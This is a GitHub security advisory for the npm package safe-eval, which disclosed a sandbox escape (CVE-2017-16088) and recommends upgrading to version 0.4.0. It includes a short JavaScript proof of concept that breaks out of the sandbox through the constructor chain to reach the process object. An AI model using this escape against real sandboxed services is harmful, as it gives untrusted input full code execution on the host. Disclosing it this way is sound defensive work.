Affected versions of `safe-eval` are vulnerable to a sandbox escape. By accessing object constructors, un-sanitized user input can access the entire standard library and effectively break out of the sandbox.

## Proof of Concept:
This code accesses the process object and calls `.exit()`
```js
var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");
```

## Recommendation

Update to version 0.4.0 or later

Affected Packages

npm safe-eval

Affected versions: 0 (last affected: 0.3.0)

Related CVEs

CVE-2017-16088

Key Information

GHSA ID

GHSA-ww6v-677g-p656

Published

July 18, 2018 6:28 PM

Last Modified

September 11, 2023 10:19 PM

CVSS Score

9.0 /10

Primary Ecosystem

npm

Primary Package

safe-eval

GitHub Reviewed

✓ Yes

Dataset

Last updated: July 4, 2025 6:27 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.